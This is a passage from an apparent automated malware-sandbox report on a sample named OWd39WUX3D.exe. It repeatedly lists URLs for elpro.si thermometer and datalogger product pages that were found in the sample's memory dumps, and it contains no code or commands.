              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/wireless-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/zunanja-in-prostorska-temperaturna
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/dodatna-oprema-za-da
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/osnovni-dataloggerji
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/precizni-dataloggerj
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/tehnoloski-data-logg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/veckanalni-in-s-tisk
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/web-brezzicni-wifi-r
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dodatna-oprema-za-termometre-logg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/ex-termometri-in-dataloggerji/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/bimetalni-termometri/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 